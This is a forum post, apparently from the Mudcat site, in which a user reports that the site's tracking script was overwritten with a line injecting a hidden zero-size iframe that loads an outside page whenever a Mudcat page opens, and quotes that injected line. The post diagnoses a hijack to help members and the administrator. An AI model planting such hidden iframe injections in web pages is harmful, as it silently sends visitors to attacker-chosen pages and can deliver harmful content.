Once again, hopefully for everybody to understand:
The Mudcat thread list and each thread contains a call to a JavaScript programme "ga_social_tracking.js".
That is a separate file, which the browser is told to download by the address "http://www.mudcat.org/ga_social_tracking.js" and then execute.
The file is meant to contain code for tracking our clicking on Facebook buttons etc. and informing Max, Google, and the NSA about it.
But now, the file has been overwritten to consist of the single line document.write("<iframe width='0' height='0' src='http://www.2345.com/?ktjwh202'></iframe>");
This alone proves that Mudcat has been hijacked (unless Max wants to test our logical abilities).
Max should immediately restore the file to its intended content, then search for the source of the infection.
I guess the script now injects that "iframe" line at the place where the script is positioned, and thus causes the browser to download the 2345.com page whenever any Mudcat page is opened. Who can confirm or challenge this?
The intention of the attacker is obviously to make us download the page very often, for example to score in some counter, or to make the 2345 server collapse.
The damage for us is at least to waste a lot of download traffic. Harmful content may be transported as well.
If we disable JavaScript, we get no 2345 page at all, whereas this morning it was hard-coded in the Mudcat HTML (perhaps now removed by Max).
To see this, you need no more technical knowledge than I have, i.e. very little.